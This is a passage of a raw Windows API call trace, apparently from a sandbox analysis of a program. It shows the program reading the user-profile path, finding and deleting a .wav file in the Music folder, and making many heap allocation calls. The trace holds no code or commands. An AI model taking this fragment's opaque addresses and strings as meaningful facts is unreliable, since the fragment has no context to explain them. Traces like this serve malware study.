(hObject=0x510) returned 1 [0208.531] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.531] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.531] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.531] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.531] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\_qp6.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\_qp6.wav", lpFilePart=0x8cedf4*="_qp6.wav") returned 0x1e [0208.531] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\_qp6.wav" (normalized: "c:\\users\\fd1hvy\\music\\_qp6.wav")) returned 0x20 [0208.531] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\_qp6.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21cea590, ftCreationTime.dwHighDateTime=0x1d5cc18, ftLastAccessTime.dwLowDateTime=0x6a2417d0, ftLastAccessTime.dwHighDateTime=0x1d5cd6c, ftLastWriteTime.dwLowDateTime=0x6a2417d0, ftLastWriteTime.dwHighDateTime=0x1d5cd6c, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="_qp6.wav", cAlternateFileName="")) returned 0x9e2078 [0208.531] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\_qp6.wav" (normalized: "c:\\users\\fd1hvy\\music\\_qp6.wav")) returned 1 [0208.534] FindNextFileW (in: hFindFile=0x9e2078, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21cea590, ftCreationTime.dwHighDateTime=0x1d5cc18, ftLastAccessTime.dwLowDateTime=0x6a2417d0, ftLastAccessTime.dwHighDateTime=0x1d5cd6c, ftLastWriteTime.dwLowDateTime=0x6a2417d0, ftLastWriteTime.dwHighDateTime=0x1d5cd6c, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="_qp6.wav", cAlternateFileName="")) returned 0 [0208.534] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0208.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74b20 | out: hHeap=0x2af0000) returned 1 [0208.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.534] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0208.534] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7b0 [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0208.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0208.535] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0208.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0208.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0208.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74ec8 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0208.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0208.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0208.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0208.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x3e) returned 0x2a5de40 [0208.536] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\_qp6.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\_qp6.wav", lpFilePart=0x8cf650*="_qp6.wav") returned 0x1e [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0208.536] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\_qp6.wav" (normalized: "c:\\users\\fd1hvy\\music\\_qp6.wav")) returned 0xffffffff [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74ec8 | out: hHeap=0x2af0000) returned 1 [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.536] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0208.536] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0208.537] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0208.537] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0208.537] CharUpperBuffW (in: lpsz="A5700E02918", cchLength=0xb | out: lpsz="A5700E02918") returned 0xb [0208.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0208.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0208.537] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0208.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0208.538] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf2b8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0208.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0208.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0208.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7060 [0208.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7060 | out: hHeap=0x2af0000) returned 1 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722f8 [0208.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.538] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0208.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa540 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0208.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0208.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0208.539] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0208.539] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0208.540] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0208.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0208.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0208.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0208.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0208.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0208.540] CharUpperBuffW (in: lpsz="SSA5700E02918", cchLength=0xd | out: lpsz="SSA5700E02918") returned 0xd [0208.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0208.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0208.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0208.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0208.540] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0208.540] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0208.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0208.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0208.540] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0208.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0208.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0208.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.541] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 